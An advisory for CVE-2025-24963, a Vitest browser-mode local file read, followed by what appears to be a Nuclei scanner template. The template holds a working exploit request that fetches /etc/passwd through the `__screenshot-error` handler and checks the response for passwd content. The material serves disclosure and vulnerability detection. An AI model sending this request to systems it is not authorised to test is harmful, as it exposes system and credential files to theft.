Vitest is a testing framework powered by Vite. The `__screenshot-error` handler on the browser mode HTTP server that responds any file on the file system. Especially if the server is exposed on the network by `browser.api.host- true`, an attacker can send a request to that handler from remote to get the content of arbitrary files.This `__screenshot-error` handler on the browser mode HTTP server responds any file on the file system. This code was added by commit `2d62051`. Users explicitly exposing the browser mode server to the network by `browser.api.host- true` may get any files exposed. This issue has been addressed in versions 2.1.9 and 3.0.4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
PoC代码[已公开]
id: CVE-2025-24963
info:
name: Vitest Browser Mode - Local File Read
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
Vitest is a testing framework powered by Vite. The `__screenshot-error` handler on the browser mode HTTP server that responds any file on the file system. Especially if the server is exposed on the network by `browser.api.host- true`, an attacker can send a request to that handler from remote to get the content of arbitrary files.This `__screenshot-error` handler on the browser mode HTTP server responds any file on the file system. This code was added by commit `2d62051`. Users explicitly exposing the browser mode server to the network by `browser.api.host- true` may get any files exposed. This issue has been addressed in versions 2.1.9 and 3.0.4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
reference:
- https://github.com/advisories/GHSA-8gvc-j273-4wm5
- https://github.com/vitest-dev/vitest/blob/f17918a79969d27a415f70431e08a9445b051e45/packages/browser/src/node/plugin.ts#L88-L130
- https://github.com/vitest-dev/vitest/commit/2d62051f13b4b0939b2f7e94e88006d830dc4d1f
- https://github.com/vitest-dev/vitest/security/advisories/GHSA-8gvc-j273-4wm5
- https://vitest.dev/guide/browser/config.html#browser-api
- https://nvd.nist.gov/vuln/detail/CVE-2025-24963
classification:
epss-score: 0.0589
epss-percentile: 0.90242
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cve-id: CVE-2025-24963
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
tags: cve,cve2025,vitest,browser,mode,lfi
http:
- raw:
- |
GET /__screenshot-error?file=/etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(content_type,'image/png')"
- "contains_all(body,'root',':*:','/bin/')"
condition: and
# digest: 490a0046304402203d2e92a644172915abb16d4c9381c92d58b2e6a0e4c35bca7e65a490d01b802e02201d2ad63a263873db563f30a609236b2a24a13e557bdc75f9539414f86c27af7b:922c64590222798bb761d5b6d8e72950